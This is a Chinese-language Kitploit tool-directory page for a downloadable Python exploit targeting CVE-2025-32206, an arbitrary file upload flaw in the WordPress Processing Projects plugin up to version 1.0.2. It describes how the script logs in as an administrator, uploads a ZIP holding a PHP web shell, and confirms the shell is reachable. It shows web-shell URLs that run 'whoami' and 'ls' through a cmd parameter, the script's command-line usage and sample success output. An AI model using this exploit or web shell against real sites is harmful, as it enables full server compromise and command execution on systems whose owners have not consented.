Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32206 — WordPress Processing Projects Plugin <= 1.0.2 存在任意文件上传漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-32206
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试
GitHubnxploited/cve-2025-32206

CVE-2025-32206

WordPress Processing Projects Plugin <= 1.0.2 存在任意文件上传漏洞

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32206 - WordPress Processing Projects <= 1.0.2 任意文件上传利用

CVE-2025-32206 横幅


🔍 CVE 信息

  • CVE ID: CVE-2025-32206
  • 漏洞类型: 无限制文件上传(Web Shell 上传)
  • 受影响插件: Processing Projects WordPress 插件
  • 受影响版本: 从未知(n/a)至 1.0.2
  • CVSS 评分: 9.1(严重)
  • 向量: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

“LABCAT Processing Projects 中存在危险类型文件无限制上传漏洞,攻击者可将 Web Shell 上传至服务器,从而导致完全失陷。”


🧑‍💻 利用说明

此 Python 利用脚本针对使用存在漏洞的 Processing Projects 插件(版本 <= 1.0.2)的 WordPress 站点。该插件未能正确处理来自已认证用户的文件上传,允许其上传包含可执行 PHP 代码(Web Shell)的任意 ZIP 文件。

利用脚本:

  1. 以管理员身份登录目标 WordPress 站点。
  2. 导航到存在漏洞的端点,并自动提取 nonce 字段。
  3. 创建包含恶意 PHP Shell(Nxploit.php)的 ZIP 文件(Nxploited.zip)。
  4. 通过模拟 WordPress 管理员行为的 POST 请求上传该文件。
  5. 检查 Shell 是否可访问:
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 Shell 使用

Shell 成功上传后,可通过 cmd 参数执行系统命令。示例:

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

该 Shell 可执行任意操作系统命令,并直接在响应中返回输出。


🚀 使用方法

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-32206 利用脚本 | 作者:Nxploited (Khaled Alenazi)

options:
  -h, --help            显示此帮助信息并退出
  -u, --url URL         目标 WordPress URL(例如 http://target.com/wordpress)
  -un, --username USERNAME     WordPress 管理员用户名
  -p, --password PASSWORD      WordPress 管理员密码

📄 示例输出

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - 任意文件上传
[+] 作者:Nxploited | Khaled Alenazi

[+] 已创建包含 Shell 的 zip 文件:Nxploited.zip -> Nxploit.php
[+] 已成功登录。
[+] 已成功提取表单字段。
[+] 已成功发送上传请求。
[+] Shell 已执行于:http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ 免责声明

此脚本仅供教育目的使用。在未拥有或未获得明确测试许可的系统上未经授权使用此利用程序是非法且不道德的。

请始终遵守负责任的披露实践,并仅在受控环境或获得明确授权的情况下使用此工具。


作者:Nxploited | Khaled Alenazi

下载工具